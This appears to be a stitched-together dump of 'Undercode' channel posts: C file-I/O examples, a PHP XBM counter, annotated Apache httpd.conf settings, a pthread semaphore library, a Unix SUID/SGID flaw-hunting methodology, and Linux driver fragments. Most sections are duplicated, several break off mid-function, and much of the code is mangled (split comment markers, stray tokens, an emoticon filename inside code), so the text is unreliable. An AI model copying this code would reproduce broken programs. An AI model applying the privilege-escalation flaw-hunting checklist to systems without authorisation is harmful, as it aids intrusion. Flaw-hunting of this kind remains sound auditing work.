int main ()
{
unsigned char *dataPtr = NULL;
dataPtr = (unsigned char *) malloc (sizeof (int) * DATA_SIZE); // The area applied for is 4096 chars, that is, the area of โโ1024 words
for(unsigned int i=0;i<DATA_SIZE;i++)
{
dataPtr [i] = i; // Initialize the cache area
}
FILE *fp = fopen("F:\\Labwindows cvi\\test.txt","ab+");
fwrite(dataPtr,sizeof(char),DATA_SIZE*sizeof(int),fp);
fclose(fp);
free(dataPtr);
system("pause");
return 0;
}
Code 4: When applying for an area with the malloc function, it is a char * area that can be applied. Unsigned int data can be installed after forced type conversion.
// datasave.cpp: defines the entry point of the console application.
//
#include "stdafx.h"
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
#define DATA_SIZE 1024
int main ()
{
unsigned char *dataPtr = NULL;
unsigned int *Ptr = NULL;
dataPtr = (unsigned char *)malloc(sizeof(int)*DATA_SIZE);
Ptr = (unsigned int *) dataPtr;
for(unsigned int i=0;i<DATA_SIZE;i++)
{
Ptr[i] = i;
}
FILE *fp = fopen("F:\\Labwindows cvi\\test.txt","ab+");
fwrite(Ptr,sizeof(unsigned int),DATA_SIZE,fp);
fclose(fp);
free(dataPtr);
system("pause");
return 0;
}
fread () function:
1) Function:
Read data from a file stream
2) The function prototype is as follows:
size_t fread(void *buffer, size_t size, size_t count, FILE *stream);
-buffer: pointer to data block
-size: the size of each data, the unit is Byte (for example: sizeof (int) is 4)
-count: number of data
-stream: file pointer
Note: The return value varies with the calling format:
(1) Call format: fread (buf, sizeof (buf), 1, fp);
When the reading is successful: when the amount of data read is exactly sizeof (buf) Byte, the return value is 1 (ie count)
Otherwise, the return value is 0 (the amount of read data is less than sizeof (buf))
(2) Call format: fread (buf, 1, sizeof (buf), fp);
The successful return value is the actual number of data read back (unit is Byte)
Code reference:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{
FILE *filp = NULL;
char fileDir[] = "/home/yangzhiyuan/Documents/test.txt";
char dataPtr[] = "Helloworld";
printf("sizeof(dataPtr) = %ld\n",sizeof(dataPtr));
filp = fopen (fileDir, "w +"); / * readable and writable, create if it does not exist * /
int writeCnt = fwrite (dataPtr, sizeof (dataPtr), 1, filp); / * The return value is 1 * /
// int writeCnt = fwrite (dataPtr, 1, sizeof (dataPtr), filp); / * The return value is 11 * /
printf("writeCnt = %d\n",writeCnt);
fclose(filp);
FILE *fp = NULL;
fp = fopen(fileDir,"r");
char buffer[256];
int readCnt = fread (buffer, sizeof (buffer), 1, fp); / * The return value is 0 * /
// int readCnt = fread (buffer, 1, sizeof (buffer), fp); / * The return value is 11 * /
printf("readCnt = %d\n",readCnt);
fclose(fp);
printf("%s\n",buffer);
exit(0);
}
Note: In this example code, two FILE variables are defined, one for write and one for read. After writing, close the file, then open it, and read. If you use a FILE variable directly, you will get an error!
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ
๐ฆ Make an xbm picturexbm is a simple two-color image bitmap format, which is used more in the early cgi. It is currently used for counters.
<? php
t.me/undercodeTesting
setXBM (1234567890,0);
function setXBM ($ num, $ mode = 0) {
settype ( $ num, "string");
$ mode = $ mode? 0xff: 0x00;
$ int_width = strlen ($ num); // digits
$ count_width = 8; // single digit width
$ count_height = 16; // height
$ bitmap = array (
0 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
1 => array (0xff, 0xff , 0xff, 0xcf, 0xc7, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xff, 0xff, 0xff),
2 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0x , 0xe7, 0xf3, 0xf9, 0xf9, 0x81, 0xff, 0xff, 0xff),
3 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xc7, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
4 => array(0xff, 0xff, 0xff, 0xcf, 0xcf, 0xc7, 0xc7, 0xcb, 0xcb, 0xcd, 0x81, 0xcf, 0x87, 0xff, 0xff, 0xff),
5 => array(0xff, 0xff, 0xff, 0x81, 0xf9, 0xf9, 0xf9, 0xc1, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
6 => array(0xff, 0xff, 0xff, 0xc7, 0xf3, 0xf9, 0xf9, 0xc1, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
7 => array(0xff, 0xff, 0xff, 0x81, 0x99, 0x9f, 0x9f, 0xcf, 0xcf, 0xe7, 0xe7, 0xf3, 0xf3, 0xff, 0xff, 0xff),
8 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0xc3, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
9 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x83, 0x9f, 0x9f, 0xcf, 0xe3, 0xff, 0xff, 0xff)
);
echo "#define counter_width " .($count_width * $int_width)."\r\n";
echo "#define counter_height " .$count_height. "\r\n";
echo "static unsigned char counter_bits[] = {\r\n";
for($i=0; $i<$count_height; ++$i) {
for($j = 0; $j < $int_width; ++$j) {
printf("0x%2x, ",$bitmap[$num[$j]][$i]^$mode);
}
}
written by undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ
๐ฆ Make an xbm picturexbm is a simple two-color image bitmap format, which is used more in the early cgi. It is currently used for counters.
<? php
t.me/undercodeTesting
setXBM (1234567890,0);
function setXBM ($ num, $ mode = 0) {
settype ( $ num, "string");
$ mode = $ mode? 0xff: 0x00;
$ int_width = strlen ($ num); // digits
$ count_width = 8; // single digit width
$ count_height = 16; // height
$ bitmap = array (
0 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
1 => array (0xff, 0xff , 0xff, 0xcf, 0xc7, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xff, 0xff, 0xff),
2 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0x , 0xe7, 0xf3, 0xf9, 0xf9, 0x81, 0xff, 0xff, 0xff),
3 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xc7, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
4 => array(0xff, 0xff, 0xff, 0xcf, 0xcf, 0xc7, 0xc7, 0xcb, 0xcb, 0xcd, 0x81, 0xcf, 0x87, 0xff, 0xff, 0xff),
5 => array(0xff, 0xff, 0xff, 0x81, 0xf9, 0xf9, 0xf9, 0xc1, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
6 => array(0xff, 0xff, 0xff, 0xc7, 0xf3, 0xf9, 0xf9, 0xc1, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
7 => array(0xff, 0xff, 0xff, 0x81, 0x99, 0x9f, 0x9f, 0xcf, 0xcf, 0xe7, 0xe7, 0xf3, 0xf3, 0xff, 0xff, 0xff),
8 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0xc3, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
9 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x83, 0x9f, 0x9f, 0xcf, 0xe3, 0xff, 0xff, 0xff)
);
echo "#define counter_width " .($count_width * $int_width)."\r\n";
echo "#define counter_height " .$count_height. "\r\n";
echo "static unsigned char counter_bits[] = {\r\n";
for($i=0; $i<$count_height; ++$i) {
for($j = 0; $j < $int_width; ++$j) {
printf("0x%2x, ",$bitmap[$num[$j]][$i]^$mode);
}
}
written by undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Apache Server's httpd.conf file commentsThe reference here is the Apache Server.._win32 version- OLD STABLE VERSION
twitter.com/undercodeNews
๐ฆ๐๐ผ๐' ๐ ๐๐๐ธโ๐ :
1) ServerType standalone #Set whether the
server is started separately (standalone) or through the internet server inetd. The former is generally used.
2) ServerRoot "d: / Apache" #Set the
server's Home directory to store the server's configuration files, error files, and log files.
PidFile logs / httpd.pid #When the
program starts, store the process ID of the parent process httpd in this file. This file name can be changed with the PidFile command.
3) ScoreBoardFile logs / apache_status #Set
the log files of some execution programs of the WWW server on the network.
#ResourceConfig conf / srm.conf
#AccessConfig conf / access.conf #The
contents of these two files are already included in the httpd.conf file.
Timeout 300 #If the
client has not been connected for 300 seconds, or the server has not transmitted data to the client for 300 seconds, it will automatically disconnect.
KeepAlive On #Set
whether to support the resume function.
MaxKeepAliveRequests 100 #Set
the number of resume transmission functions. The larger the number, the more wasted hard disk space. Set to 0 for more than continuous transmission.
KeepAliveTimeout 15 #If
the user has not sent a request to the server after 15 seconds, he cannot resume the transmission.
MaxRequestsPerChild 0
#Set the number of child processes at the same time.
ThreadsPerChild 50 #Set
the number of processes used by the server.
#Listen 3000
#Listen 12.34.56.78:80 #Allow the
use of other ports or IPs to access the server. In this example, the Port is 3000 and the IP is 12.34.56.78:80.
#BindAddress * #Set
Apache to listen to all IPs, which can also be specified specifically.
#LoadModule anon_auth_module modules / ApacheModuleAuthAnon.dll
...... #Open
the module that is not currently activated for reservation.
#ExtendedStatus On #Set
the status information generated by the server.
The reference here is the Apache Server1_3_12_win32 version.
Port 80 #Set the port
used by the server.
ServerAdmin you@your.address #Set
the E-Mail address of the server administrator.
#ServerName new.host.name
#Host name of the server. If you have a fixed IP address, you do not need to set it.
DocumentRoot "d: / Apache / htdocs" #Set
the directory for storing site html files.
<Directory />
Options FollowSymLinks
AllowOverride None
</ Directory>
# Setup / Directory instructions. Specifically:
Option: defines the operations that can be performed in the directory. None means you can only browse, FollowSymLinks allows the page to connect to other places, ExecCGI allows you to perform CGI, MultiViews allows operations such as watching animation or listening to music, Indexes allows the server to return a formatted list of directories, and Includes allows the use of SSI. These settings can be checked. All can do anything, but does not include MultiViews.
AllowOverride: Add None parameter to indicate that anyone can browse the files in this directory. Other parameters are: FileInfo, AuthConfig, Limit.
UserDir "d: / Apache / users /"
#Define the directory where users store html files.
DirectoryIndex index.html #Define
the file to be displayed first.
AccessFileName .htaccess #Define
the name of each directory access control file.
#CacheNegotiatedDocs
Define that the proxy server should not cache your pages. Not recommended for use.
UseCanonicalName On #The
server uses the server name specified by ServerName and the port address specified by Port.
written by undercoders
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Apache Server's httpd.conf file commentsThe reference here is the Apache Server.._win32 version- OLD STABLE VERSION
twitter.com/undercodeNews
๐ฆ๐๐ผ๐' ๐ ๐๐๐ธโ๐ :
1) ServerType standalone #Set whether the
server is started separately (standalone) or through the internet server inetd. The former is generally used.
2) ServerRoot "d: / Apache" #Set the
server's Home directory to store the server's configuration files, error files, and log files.
PidFile logs / httpd.pid #When the
program starts, store the process ID of the parent process httpd in this file. This file name can be changed with the PidFile command.
3) ScoreBoardFile logs / apache_status #Set
the log files of some execution programs of the WWW server on the network.
#ResourceConfig conf / srm.conf
#AccessConfig conf / access.conf #The
contents of these two files are already included in the httpd.conf file.
Timeout 300 #If the
client has not been connected for 300 seconds, or the server has not transmitted data to the client for 300 seconds, it will automatically disconnect.
KeepAlive On #Set
whether to support the resume function.
MaxKeepAliveRequests 100 #Set
the number of resume transmission functions. The larger the number, the more wasted hard disk space. Set to 0 for more than continuous transmission.
KeepAliveTimeout 15 #If
the user has not sent a request to the server after 15 seconds, he cannot resume the transmission.
MaxRequestsPerChild 0
#Set the number of child processes at the same time.
ThreadsPerChild 50 #Set
the number of processes used by the server.
#Listen 3000
#Listen 12.34.56.78:80 #Allow the
use of other ports or IPs to access the server. In this example, the Port is 3000 and the IP is 12.34.56.78:80.
#BindAddress * #Set
Apache to listen to all IPs, which can also be specified specifically.
#LoadModule anon_auth_module modules / ApacheModuleAuthAnon.dll
...... #Open
the module that is not currently activated for reservation.
#ExtendedStatus On #Set
the status information generated by the server.
The reference here is the Apache Server1_3_12_win32 version.
Port 80 #Set the port
used by the server.
ServerAdmin you@your.address #Set
the E-Mail address of the server administrator.
#ServerName new.host.name
#Host name of the server. If you have a fixed IP address, you do not need to set it.
DocumentRoot "d: / Apache / htdocs" #Set
the directory for storing site html files.
<Directory />
Options FollowSymLinks
AllowOverride None
</ Directory>
# Setup / Directory instructions. Specifically:
Option: defines the operations that can be performed in the directory. None means you can only browse, FollowSymLinks allows the page to connect to other places, ExecCGI allows you to perform CGI, MultiViews allows operations such as watching animation or listening to music, Indexes allows the server to return a formatted list of directories, and Includes allows the use of SSI. These settings can be checked. All can do anything, but does not include MultiViews.
AllowOverride: Add None parameter to indicate that anyone can browse the files in this directory. Other parameters are: FileInfo, AuthConfig, Limit.
UserDir "d: / Apache / users /"
#Define the directory where users store html files.
DirectoryIndex index.html #Define
the file to be displayed first.
AccessFileName .htaccess #Define
the name of each directory access control file.
#CacheNegotiatedDocs
Define that the proxy server should not cache your pages. Not recommended for use.
UseCanonicalName On #The
server uses the server name specified by ServerName and the port address specified by Port.
written by undercoders
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Twitter
UNDERCODE NEWS (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE NEWS (@UndercodeNews). We provides you daily hacking News & Security Warning & Technologies news & Bugs reports & Analysis... @UndercodeNews @UndercodeUpdate @iUndercode @DailyCve. Aus/Leb
semaphore child _ counter is used to force the parent thread to block until two child threads execute the printf statement and the subsequent semaphore_up (& child_counter) statement. carried out.
Semaphore.h
#ifndef SEMAPHORES
#define SEMAPHORES
#include
#include
typedef struct Semaphore
{
int v;
pthread_mutex_t mutex;
pthread_cond_t cond;
}
S emaphore;
int semaphore_down (Semaphore * S);
int semaphore_decrement (Semaphore * S);
int semaphore_up (Semaphore * S);
void semaphore_destroy (Semaphore * S);
void semaphore_init (Semaphore * S);
int semaphore_value ( semaphore * S);
int tw_pthread_cond_signal (pthread_cond_t * C);
int tw_pthread_cond_wait (pthread_cond_t * C, pthread_mutex_t * m);
int tw_pthread_mutex_unlock (pthread_mutex_t * m);
int tw_pthread_mutex_lock (pthread_mutex_t * m);
void do_error (char * MSG);
# endif
Semaphore.c
#include "semaphore.h"
/ *
* function must be called prior to semaphore use.
*
* /
void
semaphore_init (Semaphore * s)
{
s-> v = 1;
if (pthread_mutex_init (& (s-> mutex), pthread_mutexattr_default) == -1)
do_error ("Error setting up semaphore mutex");
if ( pthread_cond_init (& (s-> cond), pthread_condattr_default) == -1)
do_error ("Error setting up semaphore condition signal");
* function should be called when there is no longer a need for
* the semaphore.
*
* /
void
semaphore_destroy (Semaphore * s)
{
if (pthread_mutex_destroy (& (s-> mutex)) == -1)
do_error ("Error destroying semaphore mutex");
if (pthread_cond_destroy (& (s->cond)) == -1)
do_error ("Error destroying semaphore condition signal");
}
/ *
* function increments the semaphore and signals any threads that
* are blocked waiting a change in the semaphore.
*
* /
int
semaphore_up (Semaphore * s)
{
int value_after_op;
tw_pthread_mutex_lock ( & (s-> mutex));
(s-> v) + +;
value_after_op = s-> v;
tw_pthread_mutex_unlock (& โโ(s-> mutex));
tw_pthread_cond_signal (& (s-> cond));
return (value_after_op );
}
/ *
* function decrements the semaphore and blocks if the semaphore is
* <= 0 until another thread signals a change.
*
* /
int
semaphore_down (Semaphore * s)
{
int value_after_op;
tw_pthread_mutex_lock (& โโ(s-> mutex));
while (s-> v <= 0)
{
tw_pthread_cond_wait (& (s-> cond), & (s-> mutex) );
}
(s-> v)--;
value_after_op = s-> v;
tw_pthread_mutex_unlock (& โโ(s-> mutex));
return (value_after_op);
}
/ *
* function does NOT block but simply decrements the semaphore.
* should not be used instead of down-only for programs where
* multiple threads must up on a semaphore before another thread
* can go down, ie, allows programmer to set the semaphore to
* a negative value prior to using it for synchronization.
*
* /
int
semaphore_decrement (Semaphore * s)
(
int value_after_op;
tw_pthread_mutex_lock (& โโ(s-> mutex)); s-> v--
;
value_after_op = s-> v;
tw_pthread_mutex_unlock (& โโ(s-> mutex));
return (value_after_op);
}
/ *
* function returns the value of the semaphore at the time the
* critical section is accessed. obviously the value is not guarenteed
* after the function unlocks the critical section. provided only
* for casual debugging, a better approach is for the programmar to
* protect one semaphore with another and then check its value.
* an alternative is to simply record the value returned by semaphore_up
* or semaphore_down.
*
* /
int
semaphore_value (Semaphore * s)
{
/ * not for sync * /
int value_after_op;
tw_pthread_mutex_lock (& โโ(s-> mutex));
value_after_op = s-> v;
tw_pthread_mutex_unlock (& โโ(s-> mutex));
return (value_after_op);
}
/ * -------------------------------------- ------------------------------ * /
/ * The following functions replace standard library functions in that * /
/ * they exit on any error returned from the system calls. Saves us * /
/ * from having to check each and every call above. * /
/ * ---------------------- ---------------------------------------------- * /
int
tw_pthread_mutex_unlock (pthread_mutex_t * m)
{
int the return_value;
IF ((pthread_mutex_unlock the return_value = (m)) == -1)
do_error ( "pthread_mutex_unlock");
return (the return_value);
}
int
Semaphore.h
#ifndef SEMAPHORES
#define SEMAPHORES
#include
#include
typedef struct Semaphore
{
int v;
pthread_mutex_t mutex;
pthread_cond_t cond;
}
S emaphore;
int semaphore_down (Semaphore * S);
int semaphore_decrement (Semaphore * S);
int semaphore_up (Semaphore * S);
void semaphore_destroy (Semaphore * S);
void semaphore_init (Semaphore * S);
int semaphore_value ( semaphore * S);
int tw_pthread_cond_signal (pthread_cond_t * C);
int tw_pthread_cond_wait (pthread_cond_t * C, pthread_mutex_t * m);
int tw_pthread_mutex_unlock (pthread_mutex_t * m);
int tw_pthread_mutex_lock (pthread_mutex_t * m);
void do_error (char * MSG);
# endif
Semaphore.c
#include "semaphore.h"
/ *
* function must be called prior to semaphore use.
*
* /
void
semaphore_init (Semaphore * s)
{
s-> v = 1;
if (pthread_mutex_init (& (s-> mutex), pthread_mutexattr_default) == -1)
do_error ("Error setting up semaphore mutex");
if ( pthread_cond_init (& (s-> cond), pthread_condattr_default) == -1)
do_error ("Error setting up semaphore condition signal");
* function should be called when there is no longer a need for
* the semaphore.
*
* /
void
semaphore_destroy (Semaphore * s)
{
if (pthread_mutex_destroy (& (s-> mutex)) == -1)
do_error ("Error destroying semaphore mutex");
if (pthread_cond_destroy (& (s->cond)) == -1)
do_error ("Error destroying semaphore condition signal");
}
/ *
* function increments the semaphore and signals any threads that
* are blocked waiting a change in the semaphore.
*
* /
int
semaphore_up (Semaphore * s)
{
int value_after_op;
tw_pthread_mutex_lock ( & (s-> mutex));
(s-> v) + +;
value_after_op = s-> v;
tw_pthread_mutex_unlock (& โโ(s-> mutex));
tw_pthread_cond_signal (& (s-> cond));
return (value_after_op );
}
/ *
* function decrements the semaphore and blocks if the semaphore is
* <= 0 until another thread signals a change.
*
* /
int
semaphore_down (Semaphore * s)
{
int value_after_op;
tw_pthread_mutex_lock (& โโ(s-> mutex));
while (s-> v <= 0)
{
tw_pthread_cond_wait (& (s-> cond), & (s-> mutex) );
}
(s-> v)--;
value_after_op = s-> v;
tw_pthread_mutex_unlock (& โโ(s-> mutex));
return (value_after_op);
}
/ *
* function does NOT block but simply decrements the semaphore.
* should not be used instead of down-only for programs where
* multiple threads must up on a semaphore before another thread
* can go down, ie, allows programmer to set the semaphore to
* a negative value prior to using it for synchronization.
*
* /
int
semaphore_decrement (Semaphore * s)
(
int value_after_op;
tw_pthread_mutex_lock (& โโ(s-> mutex)); s-> v--
;
value_after_op = s-> v;
tw_pthread_mutex_unlock (& โโ(s-> mutex));
return (value_after_op);
}
/ *
* function returns the value of the semaphore at the time the
* critical section is accessed. obviously the value is not guarenteed
* after the function unlocks the critical section. provided only
* for casual debugging, a better approach is for the programmar to
* protect one semaphore with another and then check its value.
* an alternative is to simply record the value returned by semaphore_up
* or semaphore_down.
*
* /
int
semaphore_value (Semaphore * s)
{
/ * not for sync * /
int value_after_op;
tw_pthread_mutex_lock (& โโ(s-> mutex));
value_after_op = s-> v;
tw_pthread_mutex_unlock (& โโ(s-> mutex));
return (value_after_op);
}
/ * -------------------------------------- ------------------------------ * /
/ * The following functions replace standard library functions in that * /
/ * they exit on any error returned from the system calls. Saves us * /
/ * from having to check each and every call above. * /
/ * ---------------------- ---------------------------------------------- * /
int
tw_pthread_mutex_unlock (pthread_mutex_t * m)
{
int the return_value;
IF ((pthread_mutex_unlock the return_value = (m)) == -1)
do_error ( "pthread_mutex_unlock");
return (the return_value);
}
int
A good start would be listing all the suid binaries on the various OS
flavors/versions. Then try to work out why each program is suid. i.e.:
rcp is suid root because it must use a privilaged port to do user
name authentication.
Often code that was never designed to be suid, is made suid, durring
porting to solve file access problems.
We need to develope a data base that will be able to look at pairs and
triplets of data, specificly: program name, suid, sgid, object accessed
(why prog is suid/sgid), OS flavor/version, and flav/vers geniology.
Any sugestions on how to implement such a DB?
Step 3) Confirm hypotheses. (test and exploit flaws)
====================================================
Step 4) Make generalizations of the underlying system weaknesses, for
which the flaw represents a specific instance.
=====================================================================
Tool Box:
=========
AGREP: I suggest everyone obtain, and install agrep from:
ftp cs.arizona.edu /agrep/agrep.tar.Z
Agrep supports "windowing" so it can look for routines, and subroutines.
It also supports logical operators and is thus ideally suited to automating
the search for many of the following flaws. i.e. <psudocode>
agrep WINDOW {suid() NOT taintperl()} /usr/local/*.pl
or agrep WINDOW {[suid() OR sgid()] AND [system() OR popen() OR execlp()
OR execvp()]} /usr/local/src/*.c
PERMUTATION PROGRAM: Another tool worth producing is a program to generate
all possible permutations of command line flags/arguments in order to uncover
undocumented features, and try to produce errors.
TCOV:
CRASH: Posted to USENET (what FTP archive?) (descrip?)
PAPERS: There are several papers that discuss methods of finding flaws, and
present test suites.
1) An Emphirical Study of the reliability of UNIX Utilities, by Barton P.
Miller, Lars Fredriksen, and Bryan So, Comm ACM, v33 n12, pp32-44,
Dec '90. Describes a test suite for testing random input strings.
Results indicated that 25% of the programs hung, crashed, or misbehaved.
In one case the OS crashed. An understanding of buffer and register
layout on the environment in question, and the expected input is likely
to produce the desired results.
2) The Mothra tools set, in Proceedings of the 22nd Hawaii International
Conference on Systems and Software, pages 275-284, Kona, HI, January '89
3) Extending Mutation Testing to Find Environmental Bugs, by Eugene H.
Spafford, Software Practice and Experience, 20(2):181-189, Feb '90
4) A paper by IBM was mentioned that was submitted to USENIX a few years
ago. (Anyone have a citation?).
Specific Flaws to Check For:
============================
1) Look for routines that don't do boundary checking, or verify input.
ie: the gets() family of routines, where it is possible to overwrite
buffer boundaries. ( sprintf()?, gets(), etc. )
also: strcpy() which is why most src has:
#define SCYPYN((a)(b)) strcpy(a, b, sizeof(a))
2) SUID/SGID routines written in one of the shells, instead of C or
PERL.
3) SUID/SGID routines written in PERL that don't use the "taintperl"
program.)
4) SUID/SGID routines that use the system(), popen(), execlp(), or
execvp() calls to run something else.
5) Any program that uses relative path names inside the program.
6) The use of relative path names to specify dynamically linked libraries.
(look in Makefile).
7) Routines that don't check error return codes from system calls. (ie:
fork(2), suid(2), etc), setuid() rather, as in the famous rcp bug
8) Holes can often be found in code that:
A) is ported to a new environment.
B) receives unexpected input.
C) interacts with other local software.
D) accesses system files like passwd, L.sys, etc.
E) reads input from a publicly writable file/directory.
F) diagnostic programs which are typically not user-proofed.
9) Test code for unexpected input. Coverage, data flow, and mutation
testing tools are available.
flavors/versions. Then try to work out why each program is suid. i.e.:
rcp is suid root because it must use a privilaged port to do user
name authentication.
Often code that was never designed to be suid, is made suid, durring
porting to solve file access problems.
We need to develope a data base that will be able to look at pairs and
triplets of data, specificly: program name, suid, sgid, object accessed
(why prog is suid/sgid), OS flavor/version, and flav/vers geniology.
Any sugestions on how to implement such a DB?
Step 3) Confirm hypotheses. (test and exploit flaws)
====================================================
Step 4) Make generalizations of the underlying system weaknesses, for
which the flaw represents a specific instance.
=====================================================================
Tool Box:
=========
AGREP: I suggest everyone obtain, and install agrep from:
ftp cs.arizona.edu /agrep/agrep.tar.Z
Agrep supports "windowing" so it can look for routines, and subroutines.
It also supports logical operators and is thus ideally suited to automating
the search for many of the following flaws. i.e. <psudocode>
agrep WINDOW {suid() NOT taintperl()} /usr/local/*.pl
or agrep WINDOW {[suid() OR sgid()] AND [system() OR popen() OR execlp()
OR execvp()]} /usr/local/src/*.c
PERMUTATION PROGRAM: Another tool worth producing is a program to generate
all possible permutations of command line flags/arguments in order to uncover
undocumented features, and try to produce errors.
TCOV:
CRASH: Posted to USENET (what FTP archive?) (descrip?)
PAPERS: There are several papers that discuss methods of finding flaws, and
present test suites.
1) An Emphirical Study of the reliability of UNIX Utilities, by Barton P.
Miller, Lars Fredriksen, and Bryan So, Comm ACM, v33 n12, pp32-44,
Dec '90. Describes a test suite for testing random input strings.
Results indicated that 25% of the programs hung, crashed, or misbehaved.
In one case the OS crashed. An understanding of buffer and register
layout on the environment in question, and the expected input is likely
to produce the desired results.
2) The Mothra tools set, in Proceedings of the 22nd Hawaii International
Conference on Systems and Software, pages 275-284, Kona, HI, January '89
3) Extending Mutation Testing to Find Environmental Bugs, by Eugene H.
Spafford, Software Practice and Experience, 20(2):181-189, Feb '90
4) A paper by IBM was mentioned that was submitted to USENIX a few years
ago. (Anyone have a citation?).
Specific Flaws to Check For:
============================
1) Look for routines that don't do boundary checking, or verify input.
ie: the gets() family of routines, where it is possible to overwrite
buffer boundaries. ( sprintf()?, gets(), etc. )
also: strcpy() which is why most src has:
#define SCYPYN((a)(b)) strcpy(a, b, sizeof(a))
2) SUID/SGID routines written in one of the shells, instead of C or
PERL.
3) SUID/SGID routines written in PERL that don't use the "taintperl"
program.)
4) SUID/SGID routines that use the system(), popen(), execlp(), or
execvp() calls to run something else.
5) Any program that uses relative path names inside the program.
6) The use of relative path names to specify dynamically linked libraries.
(look in Makefile).
7) Routines that don't check error return codes from system calls. (ie:
fork(2), suid(2), etc), setuid() rather, as in the famous rcp bug
8) Holes can often be found in code that:
A) is ported to a new environment.
B) receives unexpected input.
C) interacts with other local software.
D) accesses system files like passwd, L.sys, etc.
E) reads input from a publicly writable file/directory.
F) diagnostic programs which are typically not user-proofed.
9) Test code for unexpected input. Coverage, data flow, and mutation
testing tools are available.
Forwarded from Backup Legal Mega
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCore Technology-Code Example :
EXPERT HACKING BY UNDERCODE :
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
***********************************************************************/
/* 1 */
#define KERNEL
#include <linux/kernel.h>
#include <linux/sched.h>
#include <linux/tty.h>
#include <linux/signal.h>
#include <linux/errno.h>
#include <linux/malloc.h>
#include <asm/io.h>
#include <asm/segment.h>
#include <asm/system.h>
#include <asm/irq.h>
#include "tdd.h"
/* 2 */
static int tdd_trace;
static int write_busy;
static int read_busy;
static struct tdd_buf *qhead;
static struct tdd_buf *qtail;
/* 3 */
static int tdd_read(struct inode *, struct file *, char *, int);
static int tdd_write(struct inode *, struct file *, char *, int);
static int tdd_ioctl(struct inode *, struct file *, unsigned int,
unsigned long);
static int tdd_open(struct inode *, struct file *);
static void tdd_release(struct inode *, struct file *);
extern void console_print(char *);
struct file_operations tdd_fops =
{
NULL,
tdd_read,
tdd_write,
NULL,
NULL,
tdd_ioctl,
NULL,
tdd_open,
tdd_release,
NULL,
NULL,
NULL,
NULL
};
]
init.c
/*******************************************************
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
***********************************************************************/
void tdd_init(void)
{
tdd_trace = TRUE;
if (register_chrdev(30, "tdd", &tdd_fops))
TRACE_TXT("Cannot register tdd driver as major device 30")
else
TRACE_TXT("Tiny device driver registered successfully")
--------------------------------------------------------------------------------
newthread
/*******************************************************
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
***********************************************************************/
new_thread(int (*start_addr)(void), int stack_size)
{
struct context *ptr;
int esp;
/* 1 */
if (!(ptr = (struct context *)malloc(sizeof(struct context))))
return 0;
/* 2 */
if (!(ptr->stack = (char *)malloc(stack_size)))
return 0;
/* 3 */
esp = (int)(ptr->stack+(stack_size-4));
*(int *)esp = (int)exit_thread;
*(int *)(esp-4) = (int)start_addr;
*(int *)(esp-icon_cool.gif = esp-4;
ptr->ebp = esp-8;
๐ฆCore Technology-Code Example :
EXPERT HACKING BY UNDERCODE :
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
